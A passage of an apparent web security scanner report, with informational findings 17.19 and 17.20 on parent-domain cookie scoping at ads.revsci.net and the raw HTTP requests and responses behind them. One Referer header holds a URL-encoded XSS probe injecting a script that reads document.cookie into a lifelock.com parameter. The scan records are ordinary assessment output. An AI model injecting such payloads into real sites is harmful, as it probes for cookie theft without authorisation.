Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_Kz1B="MLsXr98vcS5joAD3bWnZbLvnP/+KE1cvxxz+0wdb2PxBN+R0RSFIK3cKZ3+o5AVFSd5d5ssFdZ2XdS1J6ERW+BtM90GwO1Jf3J+svMJ4/csB8HP99h1rKGCqCGIh2xYI3Fvzvh3NuiMBnovWFDuF1xjfsYP1R8qsG42VULSa+sr/35iz34m/11lMDXN1AX9njioLN2ChPaIXlfxBectuiUVgU0P45W3JtxbyyxtPjFDFvSB3z65Y465ibv+/5utsqAHA6C7nBh6djpodR2d3ogV4aXJvd1v+vu8G0OhpMAsq67dES6DnMmod26xlYmpIm7oLLHQreFyS+X9JpEnNjiLVeG1pqatl8HZNbwSbBG8PdUu8OmYBIq2J4KA3tC3AUVE/bcNrvKaXikFYzLm/nYzn3T771H+QePf7"; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hid7vWrRtcbg/87S4gsVar0CeCLBpcKI72Wvze9j97z84TKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9OWf69842Hfphbg/yHhecjeZxoBUgnlB/F2HdUOiY/FnNpAR6Yb4p11NSMhG/KP2u7EP6r3IydGDFeOiju1DJKUDpjfkg6EczNi2MImmflQIF1cOVVjLfTIctA84K1Duqop5MuAE9pP2A+QQfoGhYngbnTf97wilg35GyS3/8ryDOEJH5EumfAisx5oE+dY3kzYargOAvr0G9H+GYdgpAvQb5TKPGOgN6EiCaPSm5rnJxzMqA6rO3mpCX77qa2Ho0jD3aEltyb9bJMqJ9PwqUsVpjeSYp4WGNO3JRdKJxgfniKDmNefa2d1BW2Wh8kghoYpxfExL2Wjyu5Ewt0XZcuSo4HFo+cf7EfuqX3CStW3aNIaM2ycgH5HD7+aiYvP6CLDcIR9llQyuAnOJlOgf1SYPoNDEZiaROfoFMHCCACbTyTwsIZo7gKIyJzj6oBezmQIyuVdfB0qAsJlBrbXvSia2r0+p3f1uNsfNkdzUeqiXwrKqeL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2g2r6MHc5Pzt36KPxeMWOL5418bzHZdWwqa13n89Ok/6a1QUG2VDo9UTTOb+JLnM2sYKk7sbkOFh4SBVM8phfg7sZLufZucWACOs/NLHHFV5agvJZmE1D0bSq1HSY5y44BZhNz2hBTwyEyITUaX2uP/Q1XHnliwNTiMU60QUP3w+Y3RPX0z5E/HIUe5Kt7Agvbwl+yWOum+d0YXNX2zxnx903R08ea5ceS5PWRH/1MT2luVJbro74r6EmLVmoshJLasg7fnzqszJ2WV9c+bKMnT+z8ZN1FhKx/K0FWoUf1EEuWbvAz4cqAfgEtHfT8+fo6aj/rPHGUjNsNae6l1VttJItBc2XnDjizNH7anCs3JH29ZpHJCcZvoOS6ifQ3AsA="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Kz1B=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_Uihs="MLsXr98vcS5joAD3Ramm7m1t+VG2u86F7odjMpPWFVoxB1SJLO0k7UGOYbbf8s8JwOo38i801L3UUpBivWyOp/577cI3mcnXAMS8oxiDDVp8H1BGXR3pIUBTO7FKrI7Km7BHstMovCk8DJLbgwN2wt/S3/iJ9f6MyG7GkFGqxvSem7K9r4yjmiQLUCCesqM4fw+vm8qLr7Pl6R55NhiwdK8AeGKycXRkK6kZZOOdtv9lCrPwX1hpNjhvRGV9wQXjWeXpq2LuHOSBArCH67JFEDRLnajtbNk3TMVytWT4Z4wi1GXZQb//Zfdfkj/gDfRRKLTWu9FT+q8awI+fnYB/OYTeMmZZOEqoB2TEOxgpmKNftUwnqldNqerushNz7sP1NAJwWHc3RbB+ptOuus8j9ey35j2110rTiRX28w=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hif7oMCGYsK3+DY1l13C02rTIRBqQ2OYiHGvze9j90z9N83Xdojeb1YEtuFtjInUpdmlemjXlXYGda/XzQEydWdgrHQN7q3VqUbfIOKWrXlkTYsltuQI8qsrJ2srKwKzN0Z0jMjqK585ynCYNVBi2GG3GdLN6NcUgYQs1Lspv8+3ieiZRxamLFOMb90Wvul5zWvyY11S1DyTuvYjqSYxDegoCowgeBBAG7+Xf6gDVV2QPzWFHYpGlYl3P4ZX9CpI+vgLYBPxtTTKVwIUl10sBi/44VOSWRq1H76DFQxw4mb75x/5h13Vj0wCTGJjg7TaZoA4M6vWoTrIQuQtCdyjKRdfs/I5MBHJtw2LW7PqooQ/iC6GOaO7hnD53acPYEykGdbLM6NJMcS9nKJvJsxcM+1WzrEtX+Cbxv1yl+5/H2aqQXy3rE21OIbQG0Txff9Q6+QE4SRR2rr8yhSPM3oIfcBF/T5SCBT9xRQBi+EOsjbUOlrkD/R1gThqaHXoloO+cDpDWYMdqMr2m82XWUceApd540S2Jzb5dkP1yq0s2L+ysv93dxCG9MV8zDAMz2B/owKqEvNjijXT0lUoyMHEc7PYlC/UHPRjdNEbjfsyU3vHiIPcHm2URkNHlZEiJTsz3JNnyi9NMRQSIatUASNyRzzhCImJqFxMUe9tdOjnlPjgGMtp5D+wc6ngXj5Iuz2lpF9rGuXDTDcTWp2NQU+nbFujm8qqTy6ResY3hsjgQijnWwjJB5j5LitAMxrk4fIjbcsHnW99MOBjiwVC9IOjc4cv6I/wm3tLiNhIBPThtOxWjcdljVM6n7CXuYaexrvdo06GoF3KEx44vkVU3TGis/Y96/swQJZXEHrZP11kChpj/b/jCI0sM00hIWy3sXVjyzG51eCP+KiXsOLcBCnQDPBwU+ZxZblipsN3CjeXYELsPCPWQMtJq/E2S/tGoB9YPYzU4FYs+9UtKa7cuKAFa576O/fMh9uP1/6zhP4EZBmhu0JXmu+j9eYoBao="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:17:35 GMT


17.19. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/about/leadership/management/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_btY7="MLsXr98vcS5joAC3cWnZbLu/LxacmO6l/ARkBxpP1JJrJebK5u0oIec5hQtxppxsRjkmyEG97JGtnHKzbcarrWXvOcKbltf7xkGa+l8zg6NsPWUKQV5HJAXQeFCR30Ociq0ao4q/grq6lsLC0KtAAADMs0buh6LSM9MG0LIcGHe70yIHgew/Eh0uLc+4c/4njp7GcyDdtqAZMSdSszG+gH0nvDhtaDXsHq2y65tYaObosUQZbnlscgHkfcZA4xP0oaQn/Lk2j36bu66uGkRrS4CsiWzoeFXOeaMh4yHFMNx7MqLYBUYmEVrbUD55ScTBefUUF0U4E7w5UEa9kMK7iC9gTmt3xw0L/2hRO9SwVqZNP64GcOJoZDuIezY3VtCazAUM7wNTb7K0tPc0/B538LlHHOIWHyDI6Pcx"; rsi_us_1000000="pUMdJD9HMAYYlW23lB1elXr9hifjv2rR/V4c+8rGrfYpD4E7DYk/sDOMiD26ze9j90z9N83XdjZt9ZtbR0ijMugza0Qe5pDvWTr6P4O2VQdjPWf6987WWc8u5KEGwpBscqKQZ1BB2LCvdm6n578p4Rvu6q0mDJHnkT/2jbqILCYLacH0wg0BO/PRs5ivndkckUxb3rhBm6zdK7VzeQeU44tgNRzskkGjN35lToNd85zTK6Vj+9BBbxpbelASsgX6/CR8Y5xVC8aI0ZxOO9+xP1LJ2VtAHTZTiV00au+sbBtvKMxT926tMzK0H5cwsw+g/cYgBE0rDkLsCjUxh6FLjC7i6EMGwHUbcgJhoCDKlItJyK8FU8pMQoukW4Ksl1ZOpqZ7GC0HHNVqD6t3U32r9sbTyZkKK+QA8JjzMDrdR4tTUP2OU1HeXuSVxv1yl+5/L2aqQXy3rE21OIbAG0Txff9Q6+QE4SRR2rr8yhSPM8aOTW2BlGO/zv4pDbki5ENYG1rAwHxPcsScK1CIu7nP426FZdWFs4e21wjcqJyCbd5JPJ40ccpki7u1RrKAV+CG6LFFkj53H1SCrbYfOIRrLfH5rh4eL0cfZ/vrFCCr/HEZmnQwfSO4bhpS1mYMFRTXljVGrQBXZP23w1g4SB2h2r6MHc5Pzt36KPxeMWOL5008JyU50uBQkV+DdYK4Gk+NchyAu4bzHS5mv/nQZXciumcSgzF8+UUvGNyoCfGNhSTai5t86Aacd0zjGzqDaj+g6z+b8nem9ZIkW8qaa0CMbJFNkcqd6zbZHfm4bwKc4OXmjNFwXw/aqQPgXGZdNiAABShzNlnnILNvQI/L4iLNmM8NLZISUdj8Bywe/xU4CPbov0NZunyZnU87RNKIJ8ju6qLTygwGnjEmKh4STE2cZsDOvcNSCTjfRSj9TWHSYPlOxGSR3K91I2CEvVf/GjySVjhJlm3bhym+JGHVNPjKwzs0PgWWBuKLIQBlJoyq1iJREoGQ2gRM+eiMu3rkpU9zbDFvwNQMS8je4aRvBwY="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_btY7=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_2Ia5="MLsXr98vcS5joAD3TrInbrsHB6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5LXUVUbqNw0KcSykIgDMCLZ+LUekPkU3ZzHAnufPANfumkONPJ1vRRh59tenoHHjrRb5k67Sm6BnvhZOe1mCSUSYzT/0fgOACtqy5iXVomtxAZzacvIs1os8ctiYILCzcUGEKwAUbYDZ+gRfyTNVizEkjHghBeBOehkXDWkFVpZNcmrau472yi7Tk1UQDlT2PRGx4ny6aEMndDmCQRPdzJomsgEPKOZANGnQYsYrLEvr+wJqPo2Md9XyeSIz5rA/HijFNKINO3FJhacxFZoYVdm5OhizDcF2J4MFaMQYQ5VLkgCwK5k1whxQ3zMkV3gw6CsqcayotvrS10X59UwbUP/ABx6/FxtZ9qF5+9xsG5L3dw=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUMdJD9HMAYU1E2EPnsIIDz/BtZLv2rR/V4c7O6C3v7m/kxmFYk/sE+g72Wvze9j97z84DKAm0Rt9ZtbR0ijMugza0Qe5pDtWTr6P4O2VTn9svj69842Hfo95KEGQpbMeW+0NaNhmBYTXTkRQKS1XMUccblUZCb8d1ioTrWzOZ45+knAG4/fSC2XVCuSI3SfynIhw/0lJepQCzIltDUGLYzLUkLv/MFxI8xXEt5FPdByafvFHnwcc+g50hOTbL+g7n64N54Np8vbYE35aYyaJiGjpBaC12VhkZlzFtMxirRDAwPWID4NdT8+H1n+vIDBsAcC4v6vpxRHAQWP/wFECr4Zl33i7snI0unkbnfWDKcc2lBdCDsvleyPGu7IGOFhOgsC4wPBBfAj1GcROo+BilbXokC4Pz9vadLAfzLPlIdm0h4ILB9XSlyVc4b6FJRKQ8GSIuCUsCUIuhiY7qOe4dxMbmgcF8Z5vsbPVtNU5unXYkl1MhFPAXo6dObcC7t2Mp4lHB3smqaDjmSWTHYhcyvCsdckm7oUK5b0m3OWakUES9n6/gVIYIYYx4Q8OEV/NJVzUMJ3P0YTcfNkdzUeqj3w7I6vhwmxCxO1HK1RTc4UB35R4M3XJY0QrizGyoGlm9y6oPqyNcDNzYKTvC6oJGklEo2V4PXXhd5rDMHIhx2MXWu4IK+b30e7OfPWDWKlQbvGkOch0VHJWX9SvL5QvXWojkDL40JInzmAVr4XQyDFi7ty6xaQdTP7HzqDar+jK2lgMToKlZIkWUobdESNbO5VUYuF6zbZ/f7YfwXtEOZYHnlawNXis8+0xTL3web3W3GLT/ZTAh4qtrkjAQnd3V8EdMPIYePwpRv8DD3B2L4a6XH5lygIq/vjuHhcNjMMUQ+X+fLAOHHNWjDM+52IKUhADIXMSqGCsUEAyiBu5V+I6rJBxrv9bh4sTdGrxy8QWKFJQU2vB09tMV34No6/mhl+STAB+L7fmkFhELkBHvTZutKd7KYQ1aPWbdRmJfIrHLhmsKllabrGbl63"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Location: http://ad.yieldmanager.com/pixel?id=108869&t=2
Content-Length: 0
Date: Sun, 24 Apr 2011 03:08:42 GMT


17.20. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=B61F640647B02C55E5E04158E5824DE8&rsi_site=F480C2F6A639433D3F28497600570CE9&rsi_event=86482AA5D962F069710E763F630061A8 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.lifelock.com/offers/faces/female/?promocodehide=ADCONIONRT7e556%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7f71559fd29&c3metrics=adcon
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4dd5f13b&0&&4dafa03c&271d956a153787d6fee9112e9c6a9326; udm_0=MLv38yMNYS5n556rUdZEx/o5eypOaEu8COAR17ri5FFJ0FR/DCVho1i888MpWECz+KvddW96x+ZWMrHZZuFYWRdi0Ttiyn6zmLDSlA1uK95C57yGzucOrJqdmL6fFrDcpSvmOSk7BOclNUt7RWlHZoyNrt1GLRfxm3bRtuo2CfyPwIJ/yXIAQjMu7i9OMYPewidKA0q1/0uUpVDAPnfPRNdmew//1T+ZotabTg8c6ayt0ayU5KxhIlMO0zhOP+L3247oh64Wc2CGn1MgWnIHe9nWSStP+vc6kJiQpsVud+5ttYUkKtL8m1QBsvc2/MfTrSmJXnI0dWUX75l0GP8iD+KrsfI2MNrGUtVIQ+uZpa5N+rfJ3lseYi9c8QjhAvNpVCtRO9ENE5mMruL7893kOpOAY7IcULkyGYGsBCxY4sI+d66lxNMlDF6k5UXCb8knlYN/Ww8/EpdaqhzyZL8eG/1Dj0jowZw0Nb+vX8bLorj2cXoM5TKooNjNwtfIyY/oCL0URLzpE+ULxxBO1PzzSumsnbQQckx94LUaOrT7yu7lzVJmdz68WyvKoVQZN8Yb/mxU8hMOrTYTuin/4XutORAJHPqgXVVZMUEu/kYIQ6h8fItk7HAyphTBHafByMNgzViF+86acuNmqPehmSwyo3bzOGaQ8D7cEC/HS+Km7YhnHldp/ftWGbDtTF1Mk+knFnPQbrlieCuaiTJ48OpD52r2+G/oXon0B2LAbkexGJxvbxgRFoJUuIqP7MvKAg5uf1qRa+CVa0kCPCp2ApjgCjYEUuggGpRMd/ubeKFd8+mErIfNzt3ioYjTAAREuUw/nLZibhMbKs3ak/BgaCjr2wSYrdjv6T2Xm7fVBvuqRw0yq9LZm7fqGntvbSbNQ47Yx5AQ4foj97nVvbrEwlss5I8KXNM+tQ==; rtc_PX8c=MLsvr6dssA9jpgAwLTy07NLkFT5pbG1D0HxZtFIMJ5WMmZvbeI58VT31YjW2r/grkF71Pt6B4W3+U1vgzgHP6Nj/3l7CCsilLpq71jmxvUdE4BZGYpc959fJsSNEYdh2a93/U8ympzOYdZfnH90nEI5qWKl30EvxtUMTaCCWVsIXo80UvQSGSpH11YN+FHSPknkO7SGXPlezd4yuKNwQI8ilQ1yLkGB6eUZJ; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqYlBtLYIVF5A2r78vfkK4mqrxmVeJWtwf0wDT7Fu8GN7lxA1Dc9KwErSmP4dXT1xuPfRGzjDpsZZccj2XuQUdkGz6y/8O3Ed+Hq3bYHDGvt4sfjvsXqbPn/CNAzsAbA==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4dd87afe&0&&4db23a33&271d956a153787d6fee9112e9c6a9326; rsiPus_qMqw="MLsXr98vcS5joAD35amm7m19U6iUxxv6U9Ewo82dvq95LzyKcUd+SGxI5A8JFXO/Ufo3cmIgJSeR02NSTn9t1MO8LVswzpPckYe2QVv4EmTO8C0iKgipEUF3RNcwQYCZSFvbJPRT19v/MKMdz964MkYDCoFUSqyGDYc4xdA4GxrBkplFB5AeGhIizmn8lEUUdbcs3lJN28rFRcYyoTToEHMT66LkWCsjc3YWc+ZB93S+raIXVysqKDY0IvtgMk29DWlAWZW4BWaNjzyN38bZLDzhNwxrCeRE+CyNtxE4AiDffU40S/HYFDdOetylRHtE//AbHF/OYkaWsbvT4NLZ9LmfQCNgL96LKzU4WDJvfg/Rb1HztxBka97NmdI+pcMESq8+8u52JSwXLNIZml3AvIHDmrOEK3vZNv3R70o="; rsi_us_1000000="pUMdJD9HMAYYlW23lB1alXr9BmaqyZcgtsTgox7CLyoprYp1/zjRrRdkE/0saMayW1zRBctP4a5yXujYhzAElEdNdK7CI0mkkPYR1gj5x24mapoN8USxwHCM2WMbpxh9cm+zL57iMpDf1H8p/gbqz92LyFbDy/BFYosYTU7TKf6u7EPqr3IydGDFeOShu1/JIUDpjfkg4Edk5PIbLNCSQSeTTDhzePVUUZGfrGH5Cxu/vsM3KGzNRBO371taXGzGxFh2zqztPVZV7YXa6bzNIgqjNNoe7rWkrbA4Vjt3c9XKW61KPtktvgqJHzk5Bh3AvgaGUkRUZP+yM+hAZMt8J603jd60Q0TZhNXm8n+ks8dmg/qHE59bvRulWR1CXiSzhHLjeiI5QTmoHBxqTsjC19McaSaIGuqSYh9vaAi8yo5TEP2OUVHWXYRntrWXiap2xnutW+0KCQVdJhSmPlTr7EJ1SPrzlghILwb92MoYdDoIfQDF+j6TCJT9xRQxi9EGsj7UO1JnD/C1oTBqUHmYhoeO8PtD2YMdqsr2mNVrGF8eghR5JEWOK/T5ckPlzqzM1z2ystR3r9OFg5Qhn1xdD2N/pQKqMvN/irn4czwTPnZhIJa0Z9I59KJqB5jmFqGccuZ4+Tjg1SobBz8TpbEiJTsz3JNvye/HybXVKhNIV7y+IAG5mfmlZV1LeWGQ1u38GMb8Zfxuh+YxPs7mkCI3jMpB5yEaJ3JVIsKBVj4WQyD57gFE3Oug6LaOfawPEG2hxfiWsL1KpAFBwqNU1/ekU2GrMxBaGUSrd07wjWgzb5pC4yLfHN4I6a4ZMzSiG7awfcef4Os1yheJuVRrbfmVLI+TPn/I+9JsZsm9/GQc6xUOP1JXwpG3ed+RKt+Yd03eH3CzbsWwRtCT2M9rbIKl69GFNSelHu9hutJqh3z6dZyZvwsFOy6wROL19RQINcK+NubGZj0j7vCcSzRzAPMKYz8gNdWfkgSzAznl6NO1HaMthihPi3eQwvPIHj6pnTVrpbLp5p+65nt+GBHEjVSM"

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_qMqw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_qMqw=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_-Xb3="MLsXr9EvcS5joBD3cWnZ721Ny4Obrb2QmbdXm6j+DYZlI1D1a3Tl+WHppXdZ0nS5KcMjiFbVdTcLf4NsCWD94zFAazjAnub/uD68oxiDDVp8H1BGXR3pIUBTO7FKyNbskdav3JIM2gk1wLDur6CcLQ4cH4N7i5ZJTv0xkwLB/Y2hf0p7l+ijugTLVyRmU6M4/Y7Pm8Z7rFLl6R55NhiwdK8AeGKycXRkK6kZZCLdhudtDlPwX1hpNjhvRGV9wQXjWeXpq2KumvYyqc6Ht45FEDRLnajtbNk3TMVytWT4Z4wi1GXZQb//Zfdfkj/gDfRRKLTWu9FTujmZ8rxf6YufR4TeMmZZOEqoB2TEOxgpmKNftUwnqldNqerushNz7sP1NAJwWHc3RbB+woe2tgL82Hi+ttN1+/QSaI8Y7+o="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
